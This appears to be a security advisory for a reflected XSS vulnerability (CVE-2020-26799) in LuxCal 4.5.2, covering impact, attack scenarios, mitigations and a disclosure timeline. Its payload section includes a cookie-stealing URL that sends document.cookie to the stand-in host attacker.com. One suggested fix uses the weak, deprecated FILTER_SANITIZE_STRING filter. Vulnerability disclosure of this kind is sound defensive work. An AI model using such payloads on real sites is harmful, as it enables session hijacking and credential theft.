Reflected Cross-Site Scripting (XSS) in LuxCal 4.5.2 - CVE-2020-26799

Overview #

A reflected cross-site scripting (XSS) vulnerability was discovered in LuxCal 4.5.2 which allows an unauthenticated attacker to steal other users’ data and perform malicious actions in the context of the victim’s browser session.

Technical Details #

CVE ID: CVE-2020-26799
CVSS Score: 6.1 (Medium)
Affected Versions: LuxCal v4.5.2
Latest Version: LuxCal v4.7.x (released 2018)
Vulnerability Type: Reflected Cross-Site Scripting (XSS)

Affected Component #

• File: index.php
• Parameter: RSS feed link parameter
• Attack Vector: Network (Unauthenticated)

Vulnerability Description #

The reflected XSS vulnerability exists in the index.php file where malicious JavaScript code can be injected as part of the RSS feed link parameter. The application fails to properly sanitize user input before reflecting it back in the HTML response, allowing attackers to execute arbitrary JavaScript in victims’ browsers.

Impact #

This vulnerability allows attackers to:

1. Information Disclosure - Access sensitive user data and session information
2. Cookie Stealing - Hijack user sessions by stealing authentication cookies
3. Social Engineering Attacks - Display fake login forms or malicious content
4. Cross-Site Request Forgery - Perform actions on behalf of the victim
5. Credential Harvesting - Capture user credentials through fake forms
6. Malware Distribution - Redirect users to malicious websites

Attack Scenarios #

Scenario 1: Session Hijacking An attacker can craft a malicious URL that steals the victim’s session cookies and sends them to an attacker-controlled server.

Scenario 2: Credential Theft The attacker can inject JavaScript that displays a fake login form, capturing credentials when users attempt to log in.

Scenario 3: Defacement Malicious scripts can modify the page content to display unauthorized information or redirect users to malicious sites.

Proof of Concept #

A demonstration of this vulnerability exploitation is available in the following video:

Video PoC: https://youtu.be/npw9jcQ1h1U

Basic XSS Payload Example #

<!-- Malicious URL structure -->
http://target.com/index.php?rssfeed=<script>alert('XSS')</script>

<!-- Advanced payload for cookie stealing -->
http://target.com/index.php?rssfeed=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

Attack Vectors #

• Network-based: Remote exploitation via crafted URLs
• Unauthenticated: No authentication required to exploit
• Social Engineering: Victims can be tricked into clicking malicious links
• Email/Messaging: Malicious URLs can be distributed via email or messaging platforms

Affected Organizations #

During penetration testing engagements, this vulnerable version of LuxCal was found to still be in use by various organizations, including enterprise environments, as late as October 2020. This highlights the importance of keeping software updated to the latest versions.

Mitigation #

Immediate Actions #

1. Update to Latest Version: Upgrade to LuxCal v4.7.x or later immediately
2. Input Validation: Implement proper input sanitization for all user-supplied parameters
3. Output Encoding: Ensure all dynamic content is properly encoded before output
4. Content Security Policy: Implement CSP headers to prevent XSS execution

Recommended Fixes #

// Example fix for input sanitization
$rssfeed = htmlspecialchars($_GET['rssfeed'], ENT_QUOTES, 'UTF-8');

// Or use a more comprehensive sanitization library
$rssfeed = filter_var($_GET['rssfeed'], FILTER_SANITIZE_STRING);

Security Headers #

# Add these headers to prevent XSS
Header always set X-Content-Type-Options nosniff
Header always set X-Frame-Options DENY
Header always set X-XSS-Protection "1; mode=block"
Header always set Content-Security-Policy "default-src 'self'"

Timeline #

• Discovery: October 2020 (During penetration testing engagement)
• CVE Assignment: CVE-2020-26799 assigned
• Vendor Status: LuxCal v4.7.x already available (released 2018)
• Public Disclosure: July 20, 2025

Vendor Information #

Vendor: LuxSoft
Product: LuxCal Calendar Software
Vendor Website: https://www.luxsoft.eu/index.php?pge=dload

Note: The vendor had already released LuxCal v4.7.x in 2018, which addresses this vulnerability. Organizations using older versions should upgrade immediately.

References #

• CVE-2020-26799
• LuxSoft Download Page
• Video Proof of Concept
• OWASP XSS Prevention Cheat Sheet

Credit #

This vulnerability was discovered during a penetration testing engagement and responsibly disclosed. The discovery highlights the importance of regular security assessments and keeping software updated to the latest versions.

This post is part of our ongoing security research into web applications. For more security insights, visit https://suryadina.com.